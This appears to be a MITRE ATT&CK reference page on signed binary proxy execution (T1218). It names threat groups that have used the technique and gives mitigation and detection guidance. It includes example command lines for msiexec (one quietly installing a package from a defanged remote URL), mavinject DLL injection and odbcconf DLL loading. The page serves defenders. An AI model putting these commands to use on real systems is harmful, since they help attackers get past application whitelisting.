Signed Binary Proxy Execution

Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application whitelisting and signature validation on systems. This technique accounts for proxy execution methods that are not already accounted for within the existing techniques.


Msiexec.exe is the command-line Windows utility for the Windows Installer. Adversaries may use msiexec.exe to launch malicious MSI files for code execution. An adversary may use it to launch local or network accessible MSI files.[1][2][3] Msiexec.exe may also be used to execute DLLs.[1]

  • msiexec.exe /q /i "C:\path\to\file.msi"
  • msiexec.exe /q /i http[:]//site[.]com/file.msi
  • msiexec.exe /y "C:\path\to\file.dll"


Mavinject.exe is a Windows utility that allows for code execution. Mavinject can be used to input a DLL into a running process. [4]

  • "C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe" <PID> /INJECTRUNNING <PATH DLL>
  • C:\Windows\system32\mavinject.exe <PID> /INJECTRUNNING <PATH DLL>


SyncAppvPublishingServer.exe can be used to run PowerShell scripts without executing powershell.exe. [5]


Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.[6] The utility can be misused to execute functionality equivalent to Regsvr32 with the REGSVR option to execute a DLL.[7][8][9]

  • odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"}

Several other binaries exist that may be used to perform similar behavior. [10]

ID: T1218

Tactic: Defense Evasion, Execution

Platform:  Windows

Permissions Required:  User

Data Sources:  Process monitoring, Process command-line parameters

Supports Remote:  No

Defense Bypassed:  Application whitelisting, Digital Certificate Validation

Contributors:  Nishan Maharjan, @loki248; Hans Christoffer Gaardløs; Praetorian

Version: 2.0


Cobalt Group

Cobalt Group has used odbcconf to proxy the execution of malicious DLL files.[9]


Duqu has used msiexec to execute malicious Windows Installer packages. Additionally, a PROPERTY=VALUE pair containing a 56-bit encryption key has been used to decrypt the main payload from the installer packages.[11]


Rancor has used msiexec to download and execute malicious installer files over HTTP.[2]


Certain signed binaries that can be used to execute other programs may not be necessary within a given environment. Use application whitelisting configured to block execution of these binaries if they are not required for a given system or network to prevent potential misuse by adversaries. If these binaries are required for use, then restrict execution of them to privileged accounts or groups that need to use them to lessen the opportunities for malicious use.


Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the internet, may be indicative of an intrusion. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.